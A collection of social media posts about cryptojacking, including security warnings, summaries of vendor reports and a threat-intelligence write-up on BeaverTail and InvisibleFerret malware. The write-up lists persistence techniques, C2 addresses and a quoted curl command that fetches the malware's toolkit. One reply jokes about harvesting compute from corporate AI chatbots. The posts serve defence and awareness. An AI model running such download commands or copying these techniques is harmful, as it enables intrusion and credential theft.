Sudden slowness on your device? CPU fan running at full speed for no reason? You may be a victim of malicious cryptocurrency-mining software (cryptojacking) that secretly consumes your resources. Contact us to have your computer checked. 🔌📉 #سودان_سوفت #تقنية
Microsoft exposes a cryptojacking campaign using SEO poisoning and ScreenConnect to target high-performance PCs, with malicious sites also surfaced through AI chatbots. The post From poisoned search results to GPU minin... f.mtr.cool/njgcgjxhtw
2/11 On 26 May 2026, Microsoft released findings on a cryptojacking campaign: fake download sites were promoted through SEO poisoning. Microsoft also saw indications that some of these dangerous domains had appeared in AI chatbot responses.
STOP DOWNLOADING FROM AI ANSWERS. AI can help you find the name of an app, but don't turn an AI answer into a download button. Because Microsoft has just released findings on a cryptojacking campaign. 🧵👇
Famous Chollima related Hash [48f2a3bfb7a70b97875e56d932ada0d975cd5ee154a99caf7d93550275a1548a]:

TTPs: The malware leverages a multi-stage infection process starting with social engineering. Victims are tricked into downloading a "demo project" (the ZIP file) and running it as part of a technical assessment. Once executed, the JavaScript-based BeaverTail fingerprints the system and checks for virtualized environments or sandboxes. It scans the filesystem for sensitive data, targeting over 200 browser profile directories (Chrome, Brave, Opera) to steal cookies, credentials, and cryptocurrency wallet extensions (MetaMask, Phantom, TronLink). The secondary payload, InvisibleFerret, is a modular Python RAT that provides full remote shell access and persistent control. Recent variants utilize VS Code Tasks (tasks.json) to automatically trigger execution the moment the project folder is opened in Visual Studio Code.

API Interactions & Operations:
Exact Command Run: On Windows, it typically launches a hidden window using wscript.exe to run a VBScript (e.g., start.vbs or update.vbs), which then executes a Python interpreter masquerading as a system process: cmd.exe /c svchost.exe updatedriver[.]py (where svchost.exe is actually python.exe).
Registry Changes: For persistence, it modifies the Run registry keys to ensure execution upon system startup: HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
System Changes: Creates a hidden directory (e.g., ~/.n2 on Linux/macOS or AppData\Local\Temp subfolders on Windows) to stage stolen data. Adds Windows Defender exclusions via PowerShell to prevent detection of its payloads. Schedules tasks mimicking legitimate processes like RuntimeBroker.exe or svchost.

Indicators of Compromise:
Network Infrastructure: 172[.]86[.]116.178 (C2 Server for keylogging/screenshots) 193[.]124[.]33[.]71:3217

Most Important artefact:
- Main file is dropping dozens of child files. One of these child files (a shell script named pre-commit) was observed attempting to execute: curl -fsSL https[:]//lab99[.]sbs/api/terminal/bootstrap?os=mac&flag=6 This is the bootstrap command that downloads the rest of the toolkit.

Attack Chain: Social Engineering (LinkedIn/Fake Recruiter) --> Lure to clone malicious Repo (GitHub/GitLab) --> ZIP download ("Fintech Demo[.]zip") --> VS Code Auto-Run Task OR Manual Execution --> BeaverTail Infostealer (Credential/Wallet Theft) --> InvisibleFerret Python RAT (Persistence/Full Remote Control) --> C2 Exfiltration & Cryptojacking.

#northkorea #famouschollima #beavertail #malware #threatintel #happyhunting #CyberSecurity
Anonymous🐾🐈‍⬛ retweeted
Microsoft Defender researchers described a targeted cryptojacking campaign that uses AI-assisted poisoned search results and impersonated utilities to install ScreenConnect for persistent access and GPU mining, with Defender-blocking mitigations noted. microsoft.com/en-us/security…
📱 Scanning a QR code seems harmless. But behind a simple link there can be malicious redirects, phishing, data theft or even cryptojacking. Most attacks don't start with a screen full of code. They start with an everyday action that nobody questions. ⚠️ Think before you scan. #CyberSecurity #InfoSec #Ciberseguridad
#threatreport #LowCompleteness Residential Proxies in the Wild | 09-06-2026
Source: infoblox.com/blog/threat-int…
Key details below ↓
💀Threats: Residential_proxy_technique, Kimwolf, Ipidea,
🎯Victims: Enterprise, Pharmaceutical, Food and beverage, Government, Banking, Education, Electronics, Industrial, Healthcare
🏭Industry: Government, Iot, Financial, Energy, Foodtech, Software_development, Education, Media, Healthcare
🤖LLM extracted TTPs: T1046, T1090, T1176, T1496
🧨IOCs: - Domain: 1
💽Software: Android
💻Platforms: intel
#threatreport: The prevalence of residential proxies within corporate networks has been increasingly alarming, as evidenced by findings from Infoblox, which revealed that over 65% of its Threat Defense Cloud customers have engaged with domains associated with residential proxy networks. The extensive use of these proxies raises significant concerns regarding network security and incident response efforts, as abusive actions done through residential proxies can implicate innocent organizations as malicious actors, complicating the attribution process and causing potential reputational damage. Residential proxies, which reroute internet traffic through everyday consumers' devices, enable threat actors to evade IP reputation systems and bypass fraud detection measures. Such proxies create laundered traffic that can dilute security alerts as malicious actions blend with legitimate consumer activities. Many proxies can be installed non-consensually, often embedded in applications or devices without user consent, akin to cryptojacking, which compromises bandwidth and IP address space rather than computing power. Analysis of DNS traffic from Infoblox indicates a steady increase in queries to residential proxy domains, growing over 25% from January 2025 to April 2026. This spike is partly attributed to rising demand driven by web scraping for AI model training, where residential proxies are favored due to their impersonation of real user traffic.
Notably, the incident involving the IPIDEA service takedown in January 2026 saw a significant 265% increase in affected customer networks, suggesting heightened activity and potential chaos in the proxy ecosystem. Infoblox's examination highlights the rising influence of major residential proxy providers, with services like Brightdata and Oxylabs dominating the market, and others, such as Hola and Honeygain, embedding proxy functionality within free applications. Across vertical markets, concerns mount as more than 90% of organizations in the pharmaceutical and food & beverage sectors and over 60% in banking and government have engaged with these unauthorized services. This widespread adoption necessitates a strategic approach among risk-averse organizations; adopting Protective DNS to monitor and block these proxies within networks is recommended, along with thorough assessments of DNS query logs and installed applications. Ultimately, the report stresses the pressing need for increased visibility and proactive measures to mitigate the risks posed by residential proxies, as their presence may not be entirely benign and often exists in a grey area concerning ethical usage and potential malicious intent.
PSIVS retweeted
Cryptojacking is mining for cryptocurrency on someone's network or devices without the person's consent or knowledge. Signs to look for: ⚡️Increased CPU Usage ⚡️Sudden computer crashes ⚡️Fast draining, low battery ⚡️System slowdowns
Jun 10
Hackers Abuse Fake Utility Downloads to Install ScreenConnect and Mine Cryptocurrency ift.tt/M736LwV Hackers are turning everyday software searches into a trap. A sophisticated cryptojacking campaign is actively targeting users who search for popular PC utilities onli…
4️⃣ Run a Malware Scan 🛡️ If your CPU is constantly pinned at 90-100% even when you are doing absolutely nothing, you might have an uninvited guest. Cryptojacking malware and background viruses love to hijack your CPU resources. Run a full system scan using Windows Security (Windows Defender) or a trusted third-party antivirus immediately to rule out security threats. 🔒 #WindowsFix #CyberSecurity
Day 19 of my cybersecurity learning journey. Today, through the Cisco Networking Academy introductory course, I learned about: • Cryptojacking • Cryptography • Buffer overflows • Race conditions • Crypto mining • Access control
Cryptojacking is mining for cryptocurrency on someone's network or devices without the person's consent or knowledge. Signs to look for: ⚡️Increased CPU Usage ⚡️Sudden computer crashes ⚡️Fast draining, low battery ⚡️System slowdown
🚨 SECURITY ALERT: Hola Browser Hit by Supply Chain Attack 🚨 Think your crypto portfolio is safe just because you only download from official websites? Think again. A sophisticated supply chain compromise has turned a trusted browser into a hidden malware delivery system. Here is how this silent Windows infection unfolds: 1️⃣ The Infiltration: Attackers breached the official software pipeline, slipping an undeclared, unsigned dropper file (me.exe) directly into the official browser download. 2️⃣ The Payload: Once installed, it quietly drops a background Monero cryptocurrency miner (HolaMonitorService.exe) straight onto your operating system. 3️⃣ The Stealth: To evade your detection, the miner stays completely dormant while you are actively using your PC. It only turns on to blast your CPU and drain your hardware lifespan the second your device goes idle. The Impact: The platform team has officially confirmed the compromise, stating that roughly 0.1% of their global user base has been exposed and infected. When official download sources are compromised, traditional safety rules fail. Web3 requires deep, multi-layered defense frameworks to survive. #Web3Security #Cryptojacking #MalwareAlert #CryptoSafety #ShieldGuard #SHPRO 👇 Please check the comment section to see how our membership will benefit you and protect you always from scams and hacks.
Replying to @bastiandelfin
BRAVE VPN, CazéTV on YouTube; you should be prepared to pay about 10 dollars a month for the VPN, but so far it is the best option. Pirate sites will fill you with malware, cryptojacking, phishing and identity theft, be careful... :modopacoweb off:
Replying to @Kekius_Sage
I never would,🤣 but how hard would it be to set up a bot that just keeps initiating these conversations with company bots and harvest free compute? Could this be built into a local LLM workflow with a command like "ask Ronald whenever unsure"🤔 Think cryptojacking but already public facing corporate maintained AI. Can Chipotle double check a local AI or correct for free if the local is programmed to also want a bowl? 🤣